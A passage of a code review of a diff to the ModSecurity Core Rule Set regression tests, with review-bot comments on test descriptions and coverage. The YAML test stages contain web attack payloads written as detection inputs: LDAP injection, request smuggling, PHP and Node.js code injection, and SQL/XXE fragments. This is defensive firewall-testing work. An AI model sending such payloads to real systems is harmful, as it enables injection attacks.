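(or a dated tag) for reproducible runs. `PARANOIA=5` is also outside the PL1–PL4 range the correlation rules in this diff know about; `PARANOIA=4` states the intent (all rules enabled) without relying on how an out-of-range value is handled.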
diff --git a/tests/regression/conftest.py b/tests/regression/conftest.py index b1442cc32..c2e2cd975 100644 --- a/tests/regression/conftest.py +++ b/tests/regression/conftest.py @@ -7,7 +7,7 @@ def pytest_addoption(parser): - parser.addoption('--config', action='store', default='2.9-apache') + parser.addoption('--config', action='store', default='modsec2-apache') @pytest.fixture(scope='session') diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 8c09dabd6..d19e564f2 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml @@ -150,7 +150,7 @@ uri: "/index.html:80?I=Like&Apples=Today#tag" version: "HTTP/1.1" output: - status: [400,403] + status: [400, 403] - # Normal Options request with path test_title: 920100-9 @@ -205,7 +205,7 @@ uri: "\\" version: "HTTP/1.1" output: - status: [403,400] + status: [403, 400] #log_contains: "id \"920100\"" - test_title: 920100-12 @@ -246,8 +246,8 @@ uri: \index.html version: HTTP\1.0 output: - status: [403,400] - #log_contains: id "920100" + status: [403, 400] + # log_contains: id "920100" - test_title: 920100-14 desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions @@ -283,5 +283,5 @@ User-Agent: ModSecurity CRS 3 Tests Host: localhost output: - status: [403,400] - #log_contains: id "920100" + status: [403, 400] + # log_contains: id "920100" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml index 688687a70..939ca28e7 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml 
@@ -86,8 +86,8 @@ version: HTTP/1.0 data: abc output: - status: 200 - no_log_contains: id "920160" + status: 200 + no_log_contains: id "920160" - test_title: 920160-5 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions @@ -112,5 +112,5 @@ version: HTTP/1.0 data: abc output: - status: [200,403,400] - #log_contains: id "920160" + status: [200, 403, 400] + # log_contains: id "920160" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml index fc688fd8a..08ef275fc 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml @@ -23,7 +23,7 @@ stop_magic: true uri: "/" output: - status: [200, 411] + log_contains: id "920180" - test_title: 920180-2 stages: diff --git a/util/regression-tests/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml similarity index 100% rename from util/regression-tests/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml rename to tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml index e562e3d45..5ef13f211 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml @@ -122,4 +122,4 @@ uri: / version: HTTP/1.1 output: - log_contains: id "920210" \ No newline at end of file + log_contains: id "920210" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml index e216e6b6f..efb9675c6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml 
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml @@ -79,4 +79,4 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" output: - log_contains: "id \"920220\"" \ No newline at end of file + log_contains: "id \"920220\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml index 54a5c59d2..da55b3368 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml @@ -53,4 +53,4 @@ Keep-Alive: "300" Proxy-Connection: "keep-alive" output: - log_contains: "id \"920260\"" \ No newline at end of file + log_contains: "id \"920260\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index 28d4bb336..b4f95d46c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml @@ -62,8 +62,8 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost%00" output: - status: [403,400] - #log_contains: "id \"920270\"" + status: [403, 400] + # log_contains: "id \"920270\"" - test_title: 920270-5 stages: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml index 6e186693f..1b1ea6b52 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml @@ -89,4 +89,4 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" output: - no_log_contains: "id \"920271\"" \ No newline at end of file + no_log_contains: "id \"920271\"" 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml index a8503d429..05b2f8344 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml @@ -76,4 +76,4 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" output: - log_contains: "id \"920273\"" \ No newline at end of file + log_contains: "id \"920273\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml index a75a18875..c7bd0bbc0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml @@ -22,8 +22,8 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost%1F" output: - status: [200,403,400] - #log_contains: "id \"920274\"" + status: [200, 403, 400] + # log_contains: "id \"920274\"" - test_title: 920274-2 stages: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml index 03e015a03..2cbb250b2 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml 
@@ -22,29 +22,30 @@ output: status: [403, 400] #log_contains: "id \"920290\"" - #- - #test_title: 920290-2 - #stages: - # - - # stage: - # input: - # dest_addr: "127.0.0.1" - # port: 80 - # headers: - # User-Agent: "ModSecurity CRS 3 Tests" - # Host: "%00" - # output: - # no_log_contains: "id \"920290\"" - # - - # test_title: 920290-3 - # stages: - # - - # stage: - # input: - # dest_addr: "127.0.0.1" - # port: 80 - # headers: - # User-Agent: "ModSecurity CRS 3 Tests" - # Host: "localhost" - # output: - # no_log_contains: "id \"920290\"" + +#- +#test_title: 920290-2 +#stages: +# - +# stage: +# input: +# dest_addr: "127.0.0.1" +# port: 80 +# headers: +# User-Agent: "ModSecurity CRS 3 Tests" +# Host: "%00" +# output: +# no_log_contains: "id \"920290\"" +# - +# test_title: 920290-3 +# stages: +# - +# stage: +# input: +# dest_addr: "127.0.0.1" +# port: 80 +# headers: +# User-Agent: "ModSecurity CRS 3 Tests" +# Host: "localhost" +# output: +# no_log_contains: "id \"920290\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml index d3e8c6b2c..d77950173 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml @@ -46,4 +46,3 @@ Accept: "text/plain, text/html" output: no_log_contains: "id \"920311\"" - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml index a6baf9e74..a7657807a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml @@ -30,4 +30,3 @@ Host: "localhost" output: no_log_contains: "id \"920320\"" - 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml index 220fd3fa8..e52204abb 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml @@ -31,4 +31,3 @@ Host: "localhost" output: no_log_contains: "id \"920330\"" - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml index 54cc46fcb..aaa7fdb1e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml @@ -36,5 +36,3 @@ stop_magic: true output: expect_error: true - - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml index bcb2563da..ec8112b46 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml @@ -250,5 +250,3 @@ data: "test" output: log_contains: "id \"920420\"" - - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml index e62ab55f5..8d0b64e04 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml @@ -46,8 +46,8 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" output: - status: [403,400] - #log_contains: "id \"920430\"" + status: [403, 400] + # log_contains: "id \"920430\"" - test_title: 920430-4 stages: @@ -92,8 +92,8 @@ User-Agent: "ModSecurity CRS 3 Tests #FN" Host: "localhost" output: - status: [403,400] - #log_contains: "id \"920430\"" + status: [403, 400] + # log_contains: "id \"920430\"" - test_title: 920430-7 stages: 
@@ -107,8 +107,8 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" output: - status: [403,400] - #log_contains: "id \"920430\"" + status: [403, 400] + # log_contains: "id \"920430\"" - test_title: 920430-8 @@ -181,4 +181,4 @@ version: JUNK/1.0 output: status: [403, 400] - #log_contains: id "920430" + # log_contains: id "920430" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml index e0e667f5b..6a696caaa 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml @@ -110,5 +110,3 @@ Range: "test" output: no_log_contains: "id \"920450\"" - - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml index e1ed055e1..43be0c505 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml @@ -197,4 +197,3 @@ Content-Length: 0 output: no_log_contains: "id \"920470\"" - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml index 6c23dc1df..aaf5aaf62 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml @@ -158,7 +158,8 @@ headers: User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" - Content-Type: "application/x-www-form-urlencoded;charset=ibm038" # random other IBM charset + # random other IBM charset + Content-Type: "application/x-www-form-urlencoded;charset=ibm038" data: "test=value" output: log_contains: "id \"920480\"" 
@@ -202,7 +203,8 @@ headers: User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" - Content-Type: "application/x-www-form-urlencoded; charset=\"utf-8\"" # random other IBM charset + # random other IBM charset + Content-Type: "application/x-www-form-urlencoded; charset=\"utf-8\"" data: "test=value" output: no_log_contains: "id \"920480\"" @@ -216,7 +218,8 @@ headers: User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" - Content-Type: "application/x-www-form-urlencoded; charset='utf-8'" # random other IBM charset + # random other IBM charset + Content-Type: "application/x-www-form-urlencoded; charset='utf-8'" data: "test=value" output: no_log_contains: "id \"920480\"" @@ -230,7 +233,8 @@ headers: User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" - Content-Type: "application/x-www-form-urlencoded; charset=\"garbage\"" # random other IBM charset + # random other IBM charset + Content-Type: "application/x-www-form-urlencoded; charset=\"garbage\"" data: "test=value" output: log_contains: "id \"920480\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml new file mode 100644 index 000000000..9adf2dfa8 --- /dev/null +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920510.yaml 
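Review bot: The comment `# random other IBM charset` now sits above three Content-Type values it does not describe — `charset=\"utf-8\"`, `charset='utf-8'` and `charset=\"garbage\"` are not IBM charsets, and the first two are negative cases (`no_log_contains`) while the third is a positive one. Moving the comment onto its own line made the copy-paste obvious; replace it per stage with `# quoted charset token must be accepted`, `# single-quoted charset token must be accepted` and `# unknown charset value must be flagged`, or delete it, so the test intent is not misstated. It only fits the `ibm038` stage in the preceding hunk.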
@@ -0,0 +1,97 @@ +--- + meta: + author: "Andrea Menin" + enabled: true + name: "920510.yaml" + description: "Cache-Control directives whitelist" + tests: + - test_title: 920510-1 + desc: "block request with a response cache-control directive in request" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "private" + output: + log_contains: "id \"920510\"" + - test_title: 920510-2 + desc: "block request with an invalid cache-control directive in request" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "foo=bar" + output: + log_contains: "id \"920510\"" + - test_title: 920510-3 + desc: "block request with an invalid cache-control directive in request with multiple directives" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "max-age=1, foo=bar" + output: + log_contains: "id \"920510\"" + - test_title: 920510-4 + desc: "block request with an invalid cache-control syntax in request with multiple directives" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "max-age=1,,,max-stale=2" + output: + log_contains: "id \"920510\"" + - test_title: 920510-5 + desc: "allow request with valid cache-control single directive" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "no-cache" + output: + no_log_contains: "id \"920510\"" + - test_title: 920510-6 + desc: "allow request with valid cache-control multiple directive" + stages: + - 
stage: + input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + uri: "/" + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: "localhost" + Cache-Control: "max-age=123, max-stale, no-cache" + output: + no_log_contains: "id \"920510\"" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 0667f0766..eb456983e 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml @@ -1,6 +1,6 @@ --- meta: - author: csanders-git + author: "csanders-git, Franziska Bühler" description: None enabled: true name: 921130.yaml @@ -47,3 +47,37 @@ uri: "/" output: log_contains: id "921130" + - + test_title: 921130-3 + desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2 + stages: + - + stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "*/*" + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) + method: GET + port: 80 + uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2 + output: + log_contains: id "921130" + - + test_title: 921130-4 + desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3 + stages: + - + stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "*/*" + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) + method: GET + port: 80 + uri: /?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2 + output: + log_contains: id "921130" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml index 80094eab0..534e2b4ea 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921200.yaml 
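Review bot: The allow side of this directive allowlist is thinly covered: only `no-cache`, `max-age=123` and `max-stale` are exercised with `no_log_contains`, so a false positive on any other request directive defined in RFC 7234 §5.2.1 — `no-store`, `no-transform`, `only-if-cached`, `min-fresh=<seconds>` — would pass CI unnoticed. Add one negative stage per remaining directive, plus a mixed-case one such as `Cache-Control: No-Cache` (directive tokens are case-insensitive) and a list-whitespace variant like `Cache-Control: max-age=1 , no-cache` to confirm legal optional whitespace is not flagged, each expecting `no_log_contains: "id \"920510\""`. The `desc` strings say "block request" while every assertion is log-based; under the DetectionOnly harness introduced in this change that is fine, but "flag request" describes what is actually checked.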
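Review bot: Test 921130-4's `desc` says the probe uses `HTTP/3`, but its `uri` payload ends in `HTTP%2F3.2`, so description and data disagree; either change the description to "such as HTTP/3.2" or the payload to `HTTP%2F3` so a reader knows which form the rule is being checked against. Both new stages also switch the User-Agent to `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)` instead of the `ModSecurity CRS 3 Tests` string used throughout the suite; since the assertion is `log_contains: id "921130"` the result is unaffected, but the browser-like UA breaks the convention that makes test traffic easy to spot in the audit log, so prefer the suite's UA unless the smuggling case specifically needs a different one.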
@@ -63,7 +63,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=bar)(%26)" uri: "/" @@ -80,7 +79,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=printer)(uid=*)" uri: "/" @@ -97,7 +95,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=void)(objectClass=users))(%26(objectClass=void)" uri: "/" @@ -114,7 +111,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=eb9adbd87d)!(sn=*" uri: "/" @@ -131,7 +127,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=*)!(sn=*" uri: "/" @@ -148,7 +143,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=*)(uid=*))(|(uid=*" uri: "/" @@ -165,7 +159,6 @@ headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" - port: 80 method: POST data: "foo=aaa*aaa)(cn>=bob)" uri: "/" diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index 2e07450b7..a094ff92f 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml @@ -1,3 +1,4 @@ +--- meta: author: studersi description: None diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml index 1404e1c44..b63bf7216 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml @@ -89,5 +89,3 @@ uri: /?x=$_%53%20ERVER['request_uri']; output: no_log_contains: id "933130" - - 
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml index dfd59302c..14a69c0f7 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml @@ -84,4 +84,3 @@ uri: /?foo=array_diff output: no_log_contains: id "933151" - diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index 5bd638263..7e71b9a91 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml @@ -629,4 +629,3 @@ uri: /?foo=system%20something%28%29 output: log_contains: id "933160" - diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml index 810ae43f2..b4091e3c2 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml @@ -161,4 +161,3 @@ uri: /serialize9 output: log_contains: id "933170" - diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index 0a6e0c718..2cb88d929 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml @@ -527,4 +527,4 @@ port: 80 uri: /?x=Foo%3A%3A%24variable%28%29 output: - log_contains: id "933180" \ No newline at end of file + log_contains: id "933180" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-NODEJS/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-NODEJS/934100.yaml index aed994235..f44ee94a9 100644 
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-NODEJS/934100.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-NODEJS/934100.yaml @@ -148,4 +148,4 @@ uri: /?foo=XyQkTkRfRlVOQyQkXwo= version: HTTP/1.0 output: - log_contains: id "934100" \ No newline at end of file + log_contains: id "934100" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml index 0baf856b5..b93f1f131 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml @@ -37,7 +37,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" + data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" version: HTTP/1.0 output: log_contains: id "941130" @@ -56,7 +56,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=aai" + data: "var=aai" version: HTTP/1.0 output: log_contains: id "941130" @@ -75,7 +75,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=abcd'||(select extractvalue(xmltype('%cgger;" + data: "var=abcd'||(select extractvalue(xmltype('%cgger;" version: HTTP/1.0 output: log_contains: id "941130" @@ -94,7 +94,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=" + data: "var=" version: HTTP/1.0 output: log_contains: id "941130" 
@@ -113,7 +113,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" + data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" version: HTTP/1.0 output: log_contains: id "941130" @@ -132,7 +132,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=afa" + data: "var=afa" version: HTTP/1.0 output: log_contains: id "941130" @@ -151,7 +151,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=chj" + data: "var=chj" version: HTTP/1.0 output: log_contains: id "941130" @@ -170,7 +170,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" + data: "var=/content.ini'||(select extractvalue(xmltype('%dwusu;" version: HTTP/1.0 output: log_contains: id "941130" @@ -189,7 +189,7 @@ User-Agent: ModSecurity CRS 3 Tests Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" - data : "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" + data: "var=EmptyValue'||(select extractvalue(xmltype('%awpsd;" version: HTTP/1.0 output: log_contains: id "941130" 
